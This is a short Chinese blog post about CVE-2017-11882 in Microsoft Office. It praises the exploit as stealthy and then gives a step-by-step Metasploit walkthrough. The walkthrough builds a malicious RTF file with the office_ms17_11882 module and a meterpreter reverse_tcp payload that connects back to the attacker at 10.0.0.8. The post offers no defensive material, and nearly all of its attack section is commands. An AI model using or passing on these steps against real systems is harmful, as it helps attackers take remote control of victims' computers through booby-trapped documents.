一、漏洞简介
2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。
从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的构建非常简单,姿势又非常“优雅”。例如,有些攻击效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。在后续实验过程中,大家可以自行体会。
二、漏洞复现
1、进入mfs
msfconsole
2 、搜索漏洞
search rtf
3、进入漏洞模块
use exploit/windows/fileformat/office_ms17_11882
4、设置文件名
set FiLENAME liangzeyu2.rtf 设置文件名
5、设置攻击者ip
set SRVHOST 10.0.0.8 设置攻击者ip
6、 配置反向代理
set payload windows/meterpreter/reverse_tcp
7、设置攻击者ip
set LHOST 10.0.0.8 配置攻击者ip
8、运行
run
有问题请加博主微信进行沟通!
全部评论